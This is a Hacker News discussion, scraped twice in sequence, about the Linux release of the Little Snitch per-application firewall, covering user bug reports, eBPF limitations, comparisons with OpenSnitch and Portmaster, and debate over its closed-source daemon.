I'm not a Little Snitch or Open Snitch user, I wonder if these firewalls are able to block requests done with the use of some other, allow-listed program.
Say I run a script `suspicious.py' and I deny this script from making any network requests. I also have firefox which is allowed to make any HTTPS requests. If suspicious.py does something like:
Tried it on Fedora 43 (6.19.11 x86_64) and it loaded all CPU cores, dumped 50K lines in the journal and failed to start.
> Error: the BPF_PROG_LOAD syscall returned Argument list too long (os error 7).
> littlesnitch.service: Consumed 3min 38.832s CPU time, 13.7G memory peak.
show comments
mixedbit
Recently I was wondering how viable it is to launch a niche, paid tool for Linux. I found that this is a very rare model, most tools are either just free, supported by sponsorship, supported by some paid cloud-based service that accompanies the tool, use an open-core model with paid add-ons.
I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already well established, with working payment infrastructure would be a good candidate.
show comments
mathfailure
Nice to have this as an extra option, but being a linux user I value openness of code. I am pretty content with opensnitch + opensnitch-ui.
i have been pretty happy with opensnitch. ui improvements are always welcome although what might be really interesting would be some sort of plug-in system that allows for an agent to watch my interactions activity and the outbound connections and only flag things that seem surprising. also maybe some kind of improvement over the pop-up (maybe get rid of them entirely and add some kind of cli wrapper that allow-lists child processes).
alhazrod
I remember before Little Snitch there was ZoneAlarm for Windows[0] (here is a good screenshot[1]). No clue if the current version of ZoneAlarm does anything like that (have not used it in 2 decades). I always found it weird that Linux never really had anything like it.
Shameless plug: for anyone who wants something fully open source and terminal-based, I maintain RustNet (https://github.com/domcyrus/rustnet). It's a bit different because it's a TUI for real-time connection monitoring with deep packet inspection, not a firewall. No blocking/rules, but it's cross-platform (Linux/macOS/Windows), the entire codebase is open, and it sandboxes itself after init via Landlock with capability dropping.
show comments
parhamn
Okay hear me out, I use little snitch for a while. Great product. Love finding out what phones where. I make every single request (except my browser, because I'm fine with their sandbox) block until I approve.
Recently I was wondering how you really have to trust something like little snitch given its a full kernel extension effectively able to MITM your whole network stack.
So I went digging (and asked some agents to deep research), and I couldn't find much interesting about the company or its leadership at all.
All a long way to say, anyone know anything about this company?
Wow. I have used Little Snitch on Mac for years, love this!
If anyone from obdev is reading, please give us a way to pay for it, even if it stays free :), I'd love to support development and would happily pay something between the price of Little Snitch and Little Snitch Mini.
Anyway, thanks a lot!
moduspol
I used Little Snitch on Mac a few years ago and liked it, though I wasn't a fan of how (necessarily) deep it had to be in the OS to work. It felt like one of those things where, the moment you have any kind of network connectivity issue, it's the first thing you need to disable to troubleshoot because it's the weirdest thing you're doing.
I guess what I'd really like is a middleware box or something that I could put on my home network, but would then still give the same user experience as the normal app. I don't want to have to log into some web interface and manually add firewall rules after I find something not working. I like the pop-ups that tell you exactly when you're trying to do something that is blocked, and allow you to either add a rule or not.
I'm probably straddling some gray area between consumer-focused and enterprise-focused feature sets, but it would be neat.
show comments
noisy_boy
The gold standard, which I haven't been able to achieve, is to be able to do a pi-hole/adguard style centralized control where I can allow youtube but block youtube shorts. All solutions I have seen talk about on-device setup which isn't an option given that I don't want to manage it on a per-device basis.
I used to use a Windows firewall which basically hijacked a bunch of WinAPI calls and let me approve/deny every request. Trying to be a good secure boy I ran this setup for a while but it was exhausting. Every single action needed dozens of approval windows. After a while I removed the software. I reckon it is good situationally though, trying out a new program for first time (that isn't risky enough for a VM or sandbox), might be good to turn on a tool like this.
adrianwaj
There was a similar Show HN from 3 weeks ago.
https://news.ycombinator.com/item?id=47387443 (open source too) - and there is a live window from all the machines in the swarm. https://dialtoneapp.com/explore - but only 2 so far. Maybe LittleSnitch can generate more data than this? Could end up an immune system for bad actors.
Anything new to get much better performance from low-spec machines that is idiot-proof is a game-changer.
chawyehsu
Just tried it on my laptop. Unfortunately, my laptop got extremely hot about 10 seconds after installation. The resource monitor showed that it was eating up all of my laptop's CPU. I panically stopped the service and uninstalled it before I could even open the web UI. It was a really poor first impression.
alsetmusic
Congrats to Linux users on getting a great tool from a quality development shop. Objective Development is one of our (Mac users) exemplars for attention to detail and fit & finish.
Congrats to Objective Development for expanding their well-loved tool to a new platform. You guys rock.
show comments
Avicebron
Probably should throw it out there that I'm building something inspired by littleSnitch for windows. Currently a bit stealthy about it. But when I crowd source the funding for a code signing cert I'll get it out there. Lots of inspiration from LittleSnitch, in spirit if not actual code.
show comments
mostlysimilar
Incredible. LittleSnitch is must-have for macOS and trying to get equivalent functionality on Linux was painful. So very happy to see this, and very happy to give the developers at Objective Development my money.
show comments
hackingonempty
LittleSnitch doesn't tattle on itself phoning home.
show comments
brachkow
LittleSnitch for Mac is a good looking app.
I always thought that ugly UIs on Linux are because of good designers do not intersect well with programming enthusiasts.
But looking how ugly same app looks on Linux, I’m starting to think it could be a technical limitation. Can someone elaborate?
show comments
tankenmate
I'm so surprised that so few people have heard of Portmaster, it's been around for years and runs on Linux (and Windows if you must). And if you don't need traffic history it's free.
show comments
hiccuphippo
Awesome. I always felt Linux was missing a per-application firewall. I didn't dig much into it but at least iptables didn't have rules for that when I looked.
TheTaytay
I’ve been researching the “best” way to build a little outbound network proxy to replace credential placeholders with the real secrets. Since this is designed to secure agents workloads, I figured I might as well add some domain blocking, and other outbound network controls, so I’ve been looking for Little-snitch-like apps to build on.
I’ve been surprised to find that there aren’t a ton of open source “filter and potentially block all outbound connections according to rules”. This seems like the sort of thing that would be in a lot of Linux admins’ toolkit, but I guess not! I appreciate these guys building and releasing this.
show comments
riobard
>> The macOS version uses deep packet inspection to do this more reliably. That's not an option here.
I thought it would be easier to do DPI on Linux than macOS. No???
I use Lulu on my mac. Is it good enough (compared to LittleSnitch)?
show comments
cromka
I know it sounds crazy at this point, but with popular YouTubers switching to Linux, gamers overall well-aware of Steam on Linux advantages and switching as well, plus popular software like LittleSnitch getting ported, 2026 can without irony be named as Year of Linux Desktop, right?
show comments
dSebastien
I've been using Simplewall on Windows for a while but I think it's not maintained anymore. Need to find an alternative
show comments
Suffocate5100
I'm glad people are building stuff for Linux, but the people who actually want something like this have likely already been using Opensnitch for years. I'm certainly not going to spend $60 for something that has been doing the job for free.
show comments
pshirshov
Unfortunately it significantly impacts battery life, at least at my tests.
Dig1t
>The daemon (littlesnitch --daemon) is proprietary, but free to use and redistribute.
Worth noting that it is closed source. Would be worth contributing patches to OpenSnitch to bring it up to parity with Little Snitch.
The core issue is simple and uncomfortable: through automatic updates, a vendor can run any code, with any privileges, on your machine, at any time.
-----
If the author is serious about this, then they should make their own program completely open source, and make builds bit-for-bit reproducible.
For all I know, the proprietary Little Snitch daemon, or even the binaries they're distributing for the open source components, contain backdoors that can be remotely activated to run any code, with any privileges, on your machine, at any time.
TL;DR it's closed source and there's open source alternatives.
winrid
Related - I'm working on launching Watch.ly[0] (human-in-the-loop for remotely approving network and file system access for agents) in the next week or so. It works similarly, via eBPF (although we can also fall back to NFQUEUE). Supporting 5.x+ linux kernels[1], osx, and windows.
Did not know about LittleSnitch, will definitely check it out.
Will there ever be anything like Comodo Firewall's HIPS firewall on Linux [0]? I remember when firewalls like ZoneAlarm could detect keyboard hooks from keyloggers and such. Comodo Firewall has had this for over a decade, but unfortunately they are not free anymore. For how open Linux is, it surprises me you can't handle things apps are doing on an alert by alert basis, and not just network permissions. Firewalls used to detect DLL injections, apps creating script files to run, adding stuff to start up. Now it seems firewalls only means network detection.
I know everyone today is used to upgrading every 5 seconds, but some of us are stuck on old software. For example, my Linux machine keeps rebooting and sucks up power in suspend mode because of buggy drivers in 6.12+, so I'm stuck on 6.8. (which is extra annoying because I bought this laptop for its Linux hardware support...)
show comments
jimgill
Old bottle with new lable, but good to keep eye on interfaces
badc0ffee
Does anyone know how the blocking functionality works? I worked on some eBPF code a few years ago (when BTF/CO-RE was new), and while it was powerful, you couldn't just write to memory, or make function calls in the kernel.
Is there a userland component that's using something like iptables? (Can iptables block traffic originating from/destined to a specific process nowadays?)
show comments
Myzel394
I hope they provide a binary without dynamic libraries so that we can use this on nixos as well
xrio
Back when I was still using macOS I loved Little Snitch and was a paying customer. And I agree nothing on Linux comes close. Would it be technically feasible to also provide this as a Flatpak to support immutable distros like Bazzite?
show comments
xn--yt9h
Giving it a shot right now. Very easy setup, intuitive UI, but a lot of requests' processes are not identified (while they could easily be identified, as they belong to the browser that has some, but less, identified calls)
show comments
peterspath
I really want Little Snitch for iOS.
Hopefully Apple makes the necessary frameworks available on iOS in general. Not only for supervised devices.
show comments
I_am_tiberius
FYI: It's an Austrian company behind that software.
FloatArtifact
I wish applications like this could coordinate with upstream firewall like opnsense
Tepix
> One thing to be aware of: the .lsrules format from Little Snitch on macOS is not compatible with the Linux version.
Why?
show comments
SamuelAdams
So if this is free to use on linux, what is to stop someone from doing what Colima did to Docker? Aka make a tiny Linux VM on MacOS and package Little Snitch within that?
show comments
cromka
I'd like to point out it uses very little memory, barely 33MB here. That's impressive!
sersi
> For keeping tabs on what your software is up to and blocking legitimate software from phoning home, Little Snitch for Linux works well. For hardening a system against a determined adversary, it's not the right tool.
What would be the right tool to harden in a similar way to little snitch on mac? Meaning intercepting any connection and whitelisting them reliably.
computing
doesn't work on arch (btw)
Jakson_Tate
cool to see eBPF used for a desktop firewall instead of just ddos packet dropping. the note about bpf map overflows is super relatable, dealing with that on bare-metal is a pain.
my question is... if the tracking maps fill up completely, does the daemon fail-open or fail-closed?
show comments
rvz
Also from [0].
> You can find Little Snitch for Linux here. It is free, and it will stay that way.
Don't worry, the authors know that there's no point in charging Linux users. Unlike Mac users.
So you might as well make it $0 and the (Linux) crowd goes wild that they don't need to pay a cent.
However...
> I researched a bit, found OpenSnitch, several command line tools, and various security systems built for servers. None of these gave me what I wanted: see which process is making which connections, and in the best case deny with a single click.
OpenSnitch is open source. You don't need to trust it as you can see the code yourself. Little Snitch on the other hand, is completely closed source.
Do you still trust them not to do self-reporting or phoning home, even though it is $0 and closed source?
Honestly I think it is odd such a tool isnøt considered as standard to an OS as a process manager.
Anyway, this one looks great. I hope Linux distros will incorporate this or similar into the network widgets.
joeiq
Finally!
spwa4
Of course, getting data uploads past little snitch is an exercise in triviality. For instance, using DNS tunneling. Sending requests to unrelated servers, ideally on AWS or some other cloud, so you have no idea at all who's behind the server and the firewall can't realistically block it, where the info can be retrieved by another party.
dark-star
Neat! Too bad it's proprietary closed-source though (at least the daemon is).
smashah
Is there a way to kill little snitch completely without screwing up my DNS/other things?
show comments
akimbostrawman
i will never understand why people will flock to this but opensnitch which is just better, fully open and has existed for longer (on linux) gets ignored.
show comments
imagetic
Dope.
gethly
so a firewall for linux then?
chris_wot
Can someone elaborate on the limitations bit?
"Little Snitch for Linux is built for privacy, not security, and that distinction matters. The macOS version can make stronger guarantees because it can have more complexity. On Linux, the foundation is eBPF, which is powerful but bounded: it has strict limits on storage size and program complexity. Under heavy traffic, cache tables can overflow, which makes it impossible to reliably tie every network packet to a process or a DNS name. And reconstructing which hostname was originally looked up for a given IP address requires heuristics rather than certainty. The macOS version uses deep packet inspection to do this more reliably. That's not an option here."
Is this a limitation of the eBPF implementation? Pardon my ignorance, I'm genuinely curious about this.
show comments
LoganDark
Yess, the return of the actually good landing page for the technically-minded. Now all they need to do is roll back the macOS one that looks and reads like it was designed by a marketing agency that knows nothing about computers (or even Little Snitch itself).
piekvorst
Now I can spy on the software spying at me. Nice.
shevy-java
The ultimate turnaround would be if the little snitch is snitching on the user too.
sneak
It’s not really necessary on Linux. Linux systems work without 40 invisible background services phoning home to the mothership to leak your hardware identifiers for FAA702 collection.
> The macOS version can make stronger guarantees because it can have more complexity. On Linux, the foundation is eBPF, which is powerful but bounded: it has strict limits on storage size and program complexity. Under heavy traffic, cache tables can overflow, which makes it impossible to reliably tie every network packet to a process or a DNS name.
> And reconstructing which hostname was originally looked up for a given IP address requires heuristics rather than certainty. The macOS version uses deep packet inspection to do this more reliably.
> That's not an option here.
>
> Source: https://web.archive.org/web/20260409002901/https://obdev.at/products/littlesnitch-linux/index.html
The above feels like an utter AI slop nonsense, sorry. I believe eBPF, the Linux Kernel feature, is absolutely capable for accuracy and perfect processing of network traffic.
Have you ever checked Calico or Cilium, or at least, Oryx?
show comments
shawnta
Great website features, exactly what I needed, thank you.
I'm not a Little Snitch or Open Snitch user, I wonder if these firewalls are able to block requests done with the use of some other, allow-listed program.
Say I run a script `suspicious.py' and I deny this script from making any network requests. I also have firefox which is allowed to make any HTTPS requests. If suspicious.py does something like:
will this request be blocked?Tried it on Fedora 43 (6.19.11 x86_64) and it loaded all CPU cores, dumped 50K lines in the journal and failed to start.
> Error: the BPF_PROG_LOAD syscall returned Argument list too long (os error 7).
> littlesnitch.service: Consumed 3min 38.832s CPU time, 13.7G memory peak.
Recently I was wondering how viable it is to launch a niche, paid tool for Linux. I found that this is a very rare model, most tools are either just free, supported by sponsorship, supported by some paid cloud-based service that accompanies the tool, use an open-core model with paid add-ons.
I wonder if the decision of Little Snitch to make the Linux version free forever was also informed by this "no way to make money selling tools on Linux" wisdom or if there was another motivation. It seems that if any tool has chances of making decent money on Linux, a product like Little Snitch, which is already well established, with working payment infrastructure would be a good candidate.
Nice to have this as an extra option, but being a linux user I value openness of code. I am pretty content with opensnitch + opensnitch-ui.
This has the author's blog post on it https://obdev.at/blog/little-snitch-for-linux/
i have been pretty happy with opensnitch. ui improvements are always welcome although what might be really interesting would be some sort of plug-in system that allows for an agent to watch my interactions activity and the outbound connections and only flag things that seem surprising. also maybe some kind of improvement over the pop-up (maybe get rid of them entirely and add some kind of cli wrapper that allow-lists child processes).
I remember before Little Snitch there was ZoneAlarm for Windows[0] (here is a good screenshot[1]). No clue if the current version of ZoneAlarm does anything like that (have not used it in 2 decades). I always found it weird that Linux never really had anything like it.
[0]: https://en.wikipedia.org/wiki/ZoneAlarm
[1]: https://d2nwkt1g6n1fev.cloudfront.net/helpmax/wp-content/upl...
Congrats on the Linux port, this looks very nice.
Shameless plug: for anyone who wants something fully open source and terminal-based, I maintain RustNet (https://github.com/domcyrus/rustnet). It's a bit different because it's a TUI for real-time connection monitoring with deep packet inspection, not a firewall. No blocking/rules, but it's cross-platform (Linux/macOS/Windows), the entire codebase is open, and it sandboxes itself after init via Landlock with capability dropping.
Okay hear me out, I use little snitch for a while. Great product. Love finding out what phones where. I make every single request (except my browser, because I'm fine with their sandbox) block until I approve.
Recently I was wondering how you really have to trust something like little snitch given its a full kernel extension effectively able to MITM your whole network stack.
So I went digging (and asked some agents to deep research), and I couldn't find much interesting about the company or its leadership at all.
All a long way to say, anyone know anything about this company?
How does it compare to opensnitch? https://github.com/evilsocket/opensnitch
Wow. I have used Little Snitch on Mac for years, love this!
If anyone from obdev is reading, please give us a way to pay for it, even if it stays free :), I'd love to support development and would happily pay something between the price of Little Snitch and Little Snitch Mini.
Anyway, thanks a lot!
I used Little Snitch on Mac a few years ago and liked it, though I wasn't a fan of how (necessarily) deep it had to be in the OS to work. It felt like one of those things where, the moment you have any kind of network connectivity issue, it's the first thing you need to disable to troubleshoot because it's the weirdest thing you're doing.
I guess what I'd really like is a middleware box or something that I could put on my home network, but would then still give the same user experience as the normal app. I don't want to have to log into some web interface and manually add firewall rules after I find something not working. I like the pop-ups that tell you exactly when you're trying to do something that is blocked, and allow you to either add a rule or not.
I'm probably straddling some gray area between consumer-focused and enterprise-focused feature sets, but it would be neat.
The gold standard, which I haven't been able to achieve, is to be able to do a pi-hole/adguard style centralized control where I can allow youtube but block youtube shorts. All solutions I have seen talk about on-device setup which isn't an option given that I don't want to manage it on a per-device basis.
How does it compare to Portmaster?
https://news.ycombinator.com/item?id=29761978
Portmaster – Open-source network monitor and firewall [315 points | 113 comments]
https://news.ycombinator.com/item?id=23539687
Show HN: Block trackers system-wide on Linux/Windows, a Pi-hole “to go” alt
[6 points by davegson on June 16, 2020 | 2 comments]
https://news.ycombinator.com/submitted?id=davegson
I used to use a Windows firewall which basically hijacked a bunch of WinAPI calls and let me approve/deny every request. Trying to be a good secure boy I ran this setup for a while but it was exhausting. Every single action needed dozens of approval windows. After a while I removed the software. I reckon it is good situationally though, trying out a new program for first time (that isn't risky enough for a VM or sandbox), might be good to turn on a tool like this.
There was a similar Show HN from 3 weeks ago. https://news.ycombinator.com/item?id=47387443 (open source too) - and there is a live window from all the machines in the swarm. https://dialtoneapp.com/explore - but only 2 so far. Maybe LittleSnitch can generate more data than this? Could end up an immune system for bad actors.
Anything new to get much better performance from low-spec machines that is idiot-proof is a game-changer.
Just tried it on my laptop. Unfortunately, my laptop got extremely hot about 10 seconds after installation. The resource monitor showed that it was eating up all of my laptop's CPU. I panically stopped the service and uninstalled it before I could even open the web UI. It was a really poor first impression.
Congrats to Linux users on getting a great tool from a quality development shop. Objective Development is one of our (Mac users) exemplars for attention to detail and fit & finish.
Congrats to Objective Development for expanding their well-loved tool to a new platform. You guys rock.
Probably should throw it out there that I'm building something inspired by littleSnitch for windows. Currently a bit stealthy about it. But when I crowd source the funding for a code signing cert I'll get it out there. Lots of inspiration from LittleSnitch, in spirit if not actual code.
Incredible. LittleSnitch is must-have for macOS and trying to get equivalent functionality on Linux was painful. So very happy to see this, and very happy to give the developers at Objective Development my money.
LittleSnitch doesn't tattle on itself phoning home.
LittleSnitch for Mac is a good looking app.
I always thought that ugly UIs on Linux are because of good designers do not intersect well with programming enthusiasts.
But looking how ugly same app looks on Linux, I’m starting to think it could be a technical limitation. Can someone elaborate?
I'm so surprised that so few people have heard of Portmaster, it's been around for years and runs on Linux (and Windows if you must). And if you don't need traffic history it's free.
Awesome. I always felt Linux was missing a per-application firewall. I didn't dig much into it but at least iptables didn't have rules for that when I looked.
I’ve been researching the “best” way to build a little outbound network proxy to replace credential placeholders with the real secrets. Since this is designed to secure agents workloads, I figured I might as well add some domain blocking, and other outbound network controls, so I’ve been looking for Little-snitch-like apps to build on. I’ve been surprised to find that there aren’t a ton of open source “filter and potentially block all outbound connections according to rules”. This seems like the sort of thing that would be in a lot of Linux admins’ toolkit, but I guess not! I appreciate these guys building and releasing this.
>> The macOS version uses deep packet inspection to do this more reliably. That's not an option here.
I thought it would be easier to do DPI on Linux than macOS. No???
Does it leak your IP like the Mac version?
https://news.ycombinator.com/item?id=35363343
> Little Snitch for Linux is not a security tool.
Maybe not?
> Its focus is privacy:
Or maybe yes?
I use Lulu on my mac. Is it good enough (compared to LittleSnitch)?
I know it sounds crazy at this point, but with popular YouTubers switching to Linux, gamers overall well-aware of Steam on Linux advantages and switching as well, plus popular software like LittleSnitch getting ported, 2026 can without irony be named as Year of Linux Desktop, right?
I've been using Simplewall on Windows for a while but I think it's not maintained anymore. Need to find an alternative
I'm glad people are building stuff for Linux, but the people who actually want something like this have likely already been using Opensnitch for years. I'm certainly not going to spend $60 for something that has been doing the job for free.
Unfortunately it significantly impacts battery life, at least at my tests.
>The daemon (littlesnitch --daemon) is proprietary, but free to use and redistribute.
Worth noting that it is closed source. Would be worth contributing patches to OpenSnitch to bring it up to parity with Little Snitch.
https://github.com/evilsocket/opensnitch
As articulated in the author's own blog post:
https://obdev.at/blog/little-snitch-for-linux/
The core issue is simple and uncomfortable: through automatic updates, a vendor can run any code, with any privileges, on your machine, at any time.
-----
If the author is serious about this, then they should make their own program completely open source, and make builds bit-for-bit reproducible.
For all I know, the proprietary Little Snitch daemon, or even the binaries they're distributing for the open source components, contain backdoors that can be remotely activated to run any code, with any privileges, on your machine, at any time.
Also see Safing Port master:
https://safing.io/
One person's (not my) take on why to skip this: https://the.unknown-universe.co.uk/privacy-security/little-s...
TL;DR it's closed source and there's open source alternatives.
Related - I'm working on launching Watch.ly[0] (human-in-the-loop for remotely approving network and file system access for agents) in the next week or so. It works similarly, via eBPF (although we can also fall back to NFQUEUE). Supporting 5.x+ linux kernels[1], osx, and windows.
Did not know about LittleSnitch, will definitely check it out.
[0] https://watch.ly/
[1] https://app.watch.ly/status/
Will there ever be anything like Comodo Firewall's HIPS firewall on Linux [0]? I remember when firewalls like ZoneAlarm could detect keyboard hooks from keyloggers and such. Comodo Firewall has had this for over a decade, but unfortunately they are not free anymore. For how open Linux is, it surprises me you can't handle things apps are doing on an alert by alert basis, and not just network permissions. Firewalls used to detect DLL injections, apps creating script files to run, adding stuff to start up. Now it seems firewalls only means network detection.
[0] https://help.comodo.com/uploads/Comodo%20Internet%20Security...
> The macOS version uses deep packet inspection to do this more reliably. That's not an option here.
Isn't MacOS just *nix under the hood? Genuinely curious about this difference.
Ohhh interesting. Little snitch is one of 2 apps I miss from when the Mac was my daily driver. The other app was pixelmator
How does this work with WSL2? Will it monitor windows traffic as well?
Low-effort take: can't you just run ss -tulpn repeatedly and parse the output?
Does little snitch and similar software work against solutions like Paqet?
https://github.com/hanselime/paqet
> Compatible with Linux kernel 6.12 or higher
I know everyone today is used to upgrading every 5 seconds, but some of us are stuck on old software. For example, my Linux machine keeps rebooting and sucks up power in suspend mode because of buggy drivers in 6.12+, so I'm stuck on 6.8. (which is extra annoying because I bought this laptop for its Linux hardware support...)
Old bottle with new lable, but good to keep eye on interfaces
Does anyone know how the blocking functionality works? I worked on some eBPF code a few years ago (when BTF/CO-RE was new), and while it was powerful, you couldn't just write to memory, or make function calls in the kernel.
Is there a userland component that's using something like iptables? (Can iptables block traffic originating from/destined to a specific process nowadays?)
I hope they provide a binary without dynamic libraries so that we can use this on nixos as well
Back when I was still using macOS I loved Little Snitch and was a paying customer. And I agree nothing on Linux comes close. Would it be technically feasible to also provide this as a Flatpak to support immutable distros like Bazzite?
Giving it a shot right now. Very easy setup, intuitive UI, but a lot of requests' processes are not identified (while they could easily be identified, as they belong to the browser that has some, but less, identified calls)
I really want Little Snitch for iOS.
Hopefully Apple makes the necessary frameworks available on iOS in general. Not only for supervised devices.
FYI: It's an Austrian company behind that software.
I wish applications like this could coordinate with upstream firewall like opnsense
> One thing to be aware of: the .lsrules format from Little Snitch on macOS is not compatible with the Linux version.
Why?
So if this is free to use on linux, what is to stop someone from doing what Colima did to Docker? Aka make a tiny Linux VM on MacOS and package Little Snitch within that?
I'd like to point out it uses very little memory, barely 33MB here. That's impressive!
> For keeping tabs on what your software is up to and blocking legitimate software from phoning home, Little Snitch for Linux works well. For hardening a system against a determined adversary, it's not the right tool.
What would be the right tool to harden in a similar way to little snitch on mac? Meaning intercepting any connection and whitelisting them reliably.
doesn't work on arch (btw)
cool to see eBPF used for a desktop firewall instead of just ddos packet dropping. the note about bpf map overflows is super relatable, dealing with that on bare-metal is a pain.
my question is... if the tracking maps fill up completely, does the daemon fail-open or fail-closed?
Also from [0].
> You can find Little Snitch for Linux here. It is free, and it will stay that way.
Don't worry, the authors know that there's no point in charging Linux users. Unlike Mac users.
So you might as well make it $0 and the (Linux) crowd goes wild that they don't need to pay a cent.
However...
> I researched a bit, found OpenSnitch, several command line tools, and various security systems built for servers. None of these gave me what I wanted: see which process is making which connections, and in the best case deny with a single click.
OpenSnitch is open source. You don't need to trust it as you can see the code yourself. Little Snitch on the other hand, is completely closed source.
Do you still trust them not to do self-reporting or phoning home, even though it is $0 and closed source?
[0] https://obdev.at/blog/little-snitch-for-linux/
Honestly I think it is odd such a tool isnøt considered as standard to an OS as a process manager.
Anyway, this one looks great. I hope Linux distros will incorporate this or similar into the network widgets.
Finally!
Of course, getting data uploads past little snitch is an exercise in triviality. For instance, using DNS tunneling. Sending requests to unrelated servers, ideally on AWS or some other cloud, so you have no idea at all who's behind the server and the firewall can't realistically block it, where the info can be retrieved by another party.
Neat! Too bad it's proprietary closed-source though (at least the daemon is).
Is there a way to kill little snitch completely without screwing up my DNS/other things?
i will never understand why people will flock to this but opensnitch which is just better, fully open and has existed for longer (on linux) gets ignored.
Dope.
so a firewall for linux then?
Can someone elaborate on the limitations bit?
"Little Snitch for Linux is built for privacy, not security, and that distinction matters. The macOS version can make stronger guarantees because it can have more complexity. On Linux, the foundation is eBPF, which is powerful but bounded: it has strict limits on storage size and program complexity. Under heavy traffic, cache tables can overflow, which makes it impossible to reliably tie every network packet to a process or a DNS name. And reconstructing which hostname was originally looked up for a given IP address requires heuristics rather than certainty. The macOS version uses deep packet inspection to do this more reliably. That's not an option here."
Is this a limitation of the eBPF implementation? Pardon my ignorance, I'm genuinely curious about this.
Yess, the return of the actually good landing page for the technically-minded. Now all they need to do is roll back the macOS one that looks and reads like it was designed by a marketing agency that knows nothing about computers (or even Little Snitch itself).
Now I can spy on the software spying at me. Nice.
The ultimate turnaround would be if the little snitch is snitching on the user too.
It’s not really necessary on Linux. Linux systems work without 40 invisible background services phoning home to the mothership to leak your hardware identifiers for FAA702 collection.
Why would one use this over PiHole?
good
Really like Lulu as an alternative to LittleSnitch https://objective-see.org/products/lulu.html
Have you ever checked Calico or Cilium, or at least, Oryx?
Great website features, exactly what I needed, thank you.